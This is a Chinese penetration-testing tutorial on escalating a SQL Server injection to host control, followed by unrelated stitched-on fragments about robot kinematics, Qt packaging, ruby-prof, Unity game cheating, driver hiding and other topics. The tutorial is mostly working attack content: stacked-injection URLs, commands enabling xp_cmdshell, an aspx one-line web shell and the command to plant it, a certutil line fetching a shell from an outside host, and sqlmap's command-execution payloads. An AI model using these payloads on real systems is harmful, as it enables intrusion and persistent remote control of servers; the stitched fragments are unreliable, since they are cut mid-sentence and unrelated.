本次渗透实战是演示如何sqlserver数据库如何手注来获取到主机权限,sqlmap也能帮助我们直接获取到主机权限,但是我们还是要懂得其中的一些攻击原理,这样就不会过去依赖工具,真正懂得原理即使在工具不能够使用的时候,我们依然能够有自己的方法取拿到我们想要的目标。
注入点,数据库版本探测:
我们以下用test.com来到替我们目标。
常规价格单引号实现报错:
http://test.com/video.aspx?a=3'

这里显然是有注入点的,先不管,放到sqlmap里面跑一下数据库版本信息,注入点啥的。


可以看到可以进行堆叠注入,并且数据为sqlserver,其实根据报错也能猜到是sqlserver。
一般在sqlmap中,堆叠注入是我们最想要的方式,因为它可以直接执行我们想要执行的sql语句。
查看数据库用户权限:
sqlserver数据库命令执行的条件之一就是具有超级用户权限(sysadmin)
执行SQL语句:
select is_srvrolemember('sysadmin') #如果返回值为 1,则是sysadmin;0,则不是。
既然支持堆叠注入查询,那我们就直接使用sqlmap来进行数据库操作。
sqlmap -u "http://test.com/video.aspx?a=3" --random-agent --sql-shell
select is_srvrolemember('sysadmin')

可以看到返回值为1,就代表当前数据库是sysadmin权限。
开启xp_cmdshell:
sqlserver数据库命令执行的第二个条件就是开启xp_cmdshell,输入以下命令开启,同样的在sqlmap里面进行
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
测试一下是否开启:
http://test.com/video.aspx?a=3' ;exec master..xp_cmdshell "ping 7irtxt.dnslog.cn -n 2" --
显然就是执行ping命令,然后我们到dnslog平台查看一下有无回显

可以看到有命令回显,那就代表xp_cmdshell开启成功,并且主机出网。
写入shell文件:
我们虽然可以进行命令执行了,但是我们并不能看到命令回显,所以我们要想办法写进去一个shell文件来进行权限维持。
sqlserver注入很容易就爆出网站的根目录,基本上只要报错并且有回显你就能看到网站根目录,如果有报错回显的话,想办法找到网站根目录。

这里显然爆出了网站的根目录,假设为d:\test
写入aspx一句话小马:
<% @Page Language="Jscript"%><%eval(Request.Item["shell"],"unsafe");%>
http://test.com/video.aspx?a=3' ;exec master..xp_cmdshell "'echo ^<^%^@Page Language=^"^Jscript^"^%^>^<^%^eval(Request.Item^[^"shell^"^]^,^"unsafe^")^;^%^>>d:\test\shell.aspx'--"
这里我们加^是为了转义特殊符号,如果网站没有waf的话,不出意外这个木马是能够连接上的,在这里这个网站有waf,所以我没有连接上。
没关系,我们可以让目标远程远程下载我们的免杀马,一样可以实现效果。
http://test.com/video.aspx?a=3' ;exec master..xp_cmdshell "certutil -urlcache -split -f http://test1.com/shell.aspx d:\test\shell.aspx" --

有的小伙伴可能想,我sqlmap直接一把梭不是很好吗,也不用怎么麻烦,确实,sqlmap确实挺方遍,但是如果你不懂原理,sqlmap失败之后是不是就没有方法了。
sqlmap可能遇到的问题:
一:可以直接拿到os-shell,但是执行不了命令或者是执行命令没有输出。
二:可以直接拿到os-shell,但是一些特殊命令执行没有回显。(curl,certutil,powershell等敏感命令)
三:可以直接拿到os-shell,也可以执行命令,但是是时间盲注来进行回显,输出较慢。
相信以上情况大家或多或少都有遇到过,遇到这种情况很多时候思维都被局限了,你可以尝试写一下shell文件到网站根目录,当然这不一定成功,但这个也是一种方法,可以自行体会一下。
抓包分析数据包:
sqlmap为什么可以执行sqlserver数据库并输出命令:
我们抓个包来分析一下:

首先是删除sqlmapout这个表,以防数据库中提前有这个表
3';DROP TABLE sqlmapoutput--
然后就是创建sqlmapout这个表
3';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--

然后是将你执行的命令写进sqlmapout这个表里面
3';DECLARE @kukf VARCHAR(8000);SET @kukf=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @kukf--

然后在将这个值进行读取输出,这就是为什么能够在sqlmap中看到数据输出,而直接在网站中执行却看不到
3' UNION ALL SELECT (SELECT TOP 1 CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113) FROM sqlmapoutput WHERE id NOT IN (SELECT TOP 0 id FROM sqlmapoutput ORDER BY id) ORDER BY id),NULL,NULL,NULL,NULL,NULL-- JZyI

最后再将该数据进行删除
3';DELETE FROM sqlmapoutput-

这就是一整个过程,相信看到这就不难理解为什么sqlmap可以看到输出,有时候却看不到输出,我个人感觉一方面确实是没有执行,另一方面执行却没有读到数据。因为sqlmap这一些执行的过程很多,不单单只是执行一个xp-cmdshell就完事的,所以不敢保证每一步都没有问题。
sqlmap和手注对比:
能用sqlmap尽量用sqlmap,因为sqlmap不会产生数据缓存,执行完之后会自动将表删除。而直接使用xp_cmdsehll会将产生的数据执行到某个表中,会有数据产生容易被发现。
目录0专栏介绍1平面2R机器人概述2运动学建模2.1正运动学模型2.2逆运动学模型2.3机器人运动学仿真3动力学建模3.1计算动能3.2势能计算与动力学方程3.3动力学仿真0专栏介绍?附C++/Python/Matlab全套代码?课程设计、毕业设计、创新竞赛必备!详细介绍全局规划(图搜索、采样法、智能算法等);局部规划(DWA、APF等);曲线优化(贝塞尔曲线、B样条曲线等)。?详情:图解自动驾驶中的运动规划(MotionPlanning),附几十种规划算法1平面2R机器人概述如图1所示为本文的研究本体——平面2R机器人。对参数进行如下定义:机器人广义坐标
网站的日志分析,是seo优化不可忽视的一门功课,但网站越大,每天产生的日志就越大,大站一天都可以产生几个G的网站日志,如果光靠肉眼去分析,那可能看到猴年马月都看不完,因此借助网站日志分析工具去分析网站日志,那将会使网站日志分析工作变得更简单。下面推荐两款网站日志分析软件。第一款:逆火网站日志分析器逆火网站日志分析器是一款功能全面的网站服务器日志分析软件。通过分析网站的日志文件,不仅能够精准的知道网站的访问量、网站的访问来源,网站的广告点击,访客的地区统计,搜索引擎关键字查询等,还能够一次性分析多个网站的日志文件,让你轻松管理网站。逆火网站日志分析器下载地址:https://pan.baidu.
一、机器人介绍 此处是基于MATLABRVC工具箱,对ABB-IRB-1200型号的微型机械臂进行正逆向运动学分析,并利Simulink工具实现对机械臂进行具有动力学参数的末端轨迹规划仿真,最后根据机械模型设计Simulink-Adams联合仿真。 图1.ABBIRB 1200尺寸参数示意图ABBIRB 1200提供的两种型号广泛适用于各作业,且两者间零部件通用,两种型号的工作范围分别为700 mm 和 900 mm,大有效负载分别为 7 kg 和5 kg。 IRB 1200 能够在狭小空间内能发挥其工作范围与性能优势,具有全新的设计、小型化的体积、高效的性能、易于集成、便捷的接
目录一.大致如下常见问题:(1)找不到程序所依赖的Qt库version`Qt_5'notfound(requiredby(2)CouldnotLoadtheQtplatformplugin"xcb"in""eventhoughitwasfound(3)打包到在不同的linux系统下,或者打包到高版本的相同系统下,运行程序时,直接提示段错误即segmentationfault,或者Illegalinstruction(coredumped)非法指令(4)ldd应用程序或者库,查看运行所依赖的库时,直接报段错误二.问题逐个分析,得出解决方法:(1)找不到程序所依赖的Qt库version`Qt_5'
我想使用ruby-prof和JMeter分析Rails应用程序。我对分析特定Controller/操作/或模型方法的建议方法不感兴趣,我想分析完整堆栈,从上到下。所以我运行这样的东西:RAILS_ENV=productionruby-prof-fprof.outscript/server>/dev/null然后我在上面运行我的JMeter测试计划。然而,问题是使用CTRL+C或SIGKILL中断它也会在ruby-prof可以写入任何输出之前杀死它。如何在不中断ruby-prof的情况下停止mongrel服务器? 最佳答案
文章目录认识unity打包目录结构游戏逆向流程Unity游戏攻击面可被攻击原因mono的打包建议方案锁血飞天无限金币攻击力翻倍以上统称内存挂透视自瞄压枪瞬移内购破解Unity游戏防御开发时注意数据安全接入第三方反作弊系统外挂检测思路狠人自爆实战查看目录结构用il2cppdumper例子2-森林whoishe后记认识unity打包目录结构dll一般很大,因为里面是所有的游戏功能编译成的二进制码游戏逆向流程开发人员代码被编译打包到GameAssembly.dll中使用il2ppDumper工具,并借助游戏名_Data\il2cpp_data\Metadata\global-metadata.dat
在笔者前面有一篇文章《驱动开发:断链隐藏驱动程序自身》通过摘除驱动的链表实现了断链隐藏自身的目的,但此方法恢复时会触发PG会蓝屏,偶然间在网上找到了一个作者介绍的一种方法,觉得有必要详细分析一下他是如何实现的进程隐藏的,总体来说作者的思路是最终寻找到MiProcessLoaderEntry的入口地址,该函数的作用是将驱动信息加入链表和移除链表,运用这个函数即可动态处理驱动的添加和移除问题。MiProcessLoaderEntry(pDriverObject->DriverSection,1)添加MiProcessLoaderEntry(pDriverObject->DriverSection,
目录1. 研究范围定义2. 流程中台市场分析3. 厂商评估:微宏科技4. 入选证书 1. 研究范围定义近年来,随着外部市场环境快速变化、客户需求愈发多样,企业逐渐意识到,自身业务需要更加敏捷、高效,具备根据市场需求快速迭代的能力。业务流程的自动化能够帮助企业实现业务的敏捷高效,因此受到越来越多企业的关注。企业的“自动化武器库”品类丰富,包括低/零代码平台、RPA、BPM、AI等。企业可以使用多项自动化工具,但结果往往是各项自动化工具处于各自的“自动化烟囱”之中,仅能实现碎片式自动化。例如,某企业的IT团队可能在使用低代码平台、财务团队可能在使用RPA、呼叫中心则可能在使用聊天机器人。自动
我可以使用什么来分析1.9.2中的代码?我发现所有版本的ruby-prof都针对1.9.2存在段错误。例如,当我添加gem"ruby-prof"到我的Rails项目的Gemfile并运行bundlebundleexecruby-profconfig/environment.rb我遇到段错误。城里有新的分析gem吗?有没有办法让ruby-prof玩得很好? 最佳答案 不确定它是否有帮助,但我偶然发现了这一点,它可能会增加一点清晰度或引导您走上不同的道路:http://www.devheads.net/development/r
查看原文>>>基于”PLUS模型+“生态系统服务多情景模拟预测实践技术应用目录第一章、理论基础与软件讲解第二章、数据获取与制备第三章、土地利用格局模拟第四章、生态系统服务评估第五章、时空变化及驱动机制分析第六章、论文撰写技巧及案例分析基于ArcGISPro、Python、USLE、INVEST模型等多技术融合的生态系统服务构建生态安全格局基于生态系统服务(InVEST模型)的人类活动、重大工程生态成效评估、论文写作等具体应用基于ArcGISPro、R、INVEST等多技术融合下生态系统服务权衡与协同动态分析实践应用 本文从数据、方法、实践三方面对生态系统服务多情景预测进行讲解。内容涵盖多